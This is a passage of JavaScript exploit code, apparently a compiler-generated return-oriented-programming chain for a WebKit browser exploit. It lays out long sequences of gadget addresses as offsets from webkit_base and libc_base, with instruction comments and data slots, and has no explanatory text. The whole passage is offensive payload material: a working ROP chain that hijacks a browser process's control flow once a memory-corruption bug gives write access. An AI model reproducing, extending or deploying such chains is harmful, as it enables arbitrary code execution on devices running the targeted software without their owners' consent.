//pop rsi ropchain+281488, //L5373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+281456, //L5371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+281472, //L5372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5370: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5371: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5372: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5373: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+281544, //L5375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5375: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+281672, //L5377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+281688, //L5378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281656, //L5376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5376: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5378: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281848, //L5382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+281816, //L5380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281832, //L5381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5379: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5380: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5381: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5382: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+281904, //L5384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5384: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+282032, //L5386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282048, //L5387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282016, //L5385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5385: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5387: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282128, //L5388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282144, //L5389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5388: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5389: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282240, //L5391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282224, //L5390 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5390: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5391: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+282320, //L5392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5392: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5393: db([10, 0]); // 0xa set_gadget(libc_base+144605,); //pop rdi //L5394: db([10, 0]); // 0xa set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282464, //L5395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282496, //L5397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282480, //L5396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5395: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5397: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+282672, //L5399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282688, //L5400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+282656, //L5398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5398: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5400: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282800, //L5402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282848, //L5405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282816, //L5403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5402: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5403: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5405: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+282960, //L5406+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+282952, //L5406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5406: db([0, 0]); // 0x0 set_gadgets([ ropchain+282976, //L5406+24 ropchain+284112, //L5401 libc_base+759608 //pop rax ]); //L5407: db([48, 0]); // 0x30 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+283064, //L5408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5410: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+283184, //L5413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+283168, //L5411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5411: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5413: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+283344, //L5417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+283312, //L5415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+283328, //L5416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5414: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5415: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5416: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5417: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+283400, //L5419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5419: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+283528, //L5421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+283544, //L5422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283512, //L5420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5420: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5421: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5422: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+283704, //L5426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+283672, //L5424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283688, //L5425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5423: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5424: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5425: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5426: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+283760, //L5428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5428: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+283888, //L5430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+283904, //L5431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283872, //L5429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5429: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5430: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5431: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+284016, //L5432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+284048, //L5434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+284032, //L5433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5432: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5433: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5434: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+782311, //pop rsp ropchain+286504, //L5435 //L5401: libc_base+764760, //pop rsi ropchain+284152, //L5436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5436: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5438: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+284272, //L5441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+284256, //L5439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5439: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5441: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+284448, //L5444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+284464, //L5445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+284416, //L5442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+284432, //L5443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5442: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5443: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5445: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+284560, //L5447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+284544, //L5446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5446: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5447: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5448: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5449: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L5450: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+284760, //L5452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5452: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+284816, //L5453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5453: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+284952, //L5457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+284936, //L5456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5455: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5456: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5457: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+285088, //L5460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+285120, //L5462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285072, //L5459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5459: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5460: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5461: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5462: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+285232, //L5463+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+285224, //L5463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5463: db([0, 0]); // 0x0 set_gadgets([ ropchain+285248, //L5463+24 ropchain+285280, //L5458 libc_base+759608 //pop rax ]); //L5465: db([65, 0]); // 0x41 set_gadgets([ libc_base+782311, //pop rsp ropchain+285296, //L5464 //L5458: libc_base+759608 //pop rax ]); //L5466: db([97, 0]); // 0x61 //L5464: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+285368, //L5467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5467: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5469: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+285488, //L5472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+285472, //L5470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5470: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5472: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+285648, //L5476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+285616, //L5474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+285632, //L5475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5473: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5474: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5476: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+285704, //L5478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5478: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+285832, //L5480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+285848, //L5481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285816, //L5479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5479: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5480: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5481: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286008, //L5485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+285976, //L5483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285992, //L5484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5482: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5483: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5484: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5485: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+286064, //L5487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5487: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+286192, //L5489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286208, //L5490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286176, //L5488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5488: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5489: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5490: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286320, //L5491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286352, //L5493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286336, //L5492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5491: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5492: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5493: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5494: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L5495: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L5435: libc_base+764760, //pop rsi ropchain+286616, //L5497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286632, //L5498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+286600, //L5496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5496: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5497: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5498: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286792, //L5502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+286760, //L5500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286776, //L5501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5499: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5500: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5501: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5502: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+286848, //L5504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5504: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+286976, //L5506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286992, //L5507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286960, //L5505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5505: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5506: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5507: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+287088, //L5509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+287072, //L5508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5508: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5509: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+287184, //L5511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5510: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L5511: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+287264, //L5513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5513: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287320, //L5514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5514: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+287400, //L5516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5516: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5518: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+287520, //L5521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+287504, //L5519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5519: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5521: db([0, 0]); // 0x0 set_gadgets([ 